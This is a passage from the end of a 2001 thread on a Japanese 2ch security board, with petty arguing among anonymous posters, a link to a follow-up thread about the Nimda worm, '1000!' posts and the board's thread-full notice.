ここで一生懸命アドバイスしてくれてる人がいっぱいいるのに、「情報ぜんぜんないじゃん」て言い方失礼だと思って、揶揄して言ってみたんだけどわかんなかった?
そいで輪をかけてつまらんつっこみいれてくるし(苦笑)
お父ちゃんほんと情けなかぁ、こげんバカムスコ生んでからに(>_<)

993 :名無しさん@お腹いっぱい。:01/09/23 08:16
>>991
>>982>>985だったな。わり

994 :名無しさん@お腹いっぱい。:01/09/23 08:20
>>990
それ、ただの言葉の遊び。観念で展開するならスレ板違い。

995 :名無しさん@お腹いっぱい。:01/09/23 08:22
>>990
ジコベンゴ ウザイ

996 :名無しさん@お腹いっぱい。:01/09/23 08:27
Nimda !! その産
http://ton.2ch.net/test/read.cgi?bbs=sec&key=1001177275

997 :1000:01/09/23 10:32
1000!

998 :1000:01/09/23 10:32
1000! 

999 :1000:01/09/23 10:32
1000!  

1000 :1000:01/09/23 10:32
1000!   

1001 :1001:Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。

283 KB
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)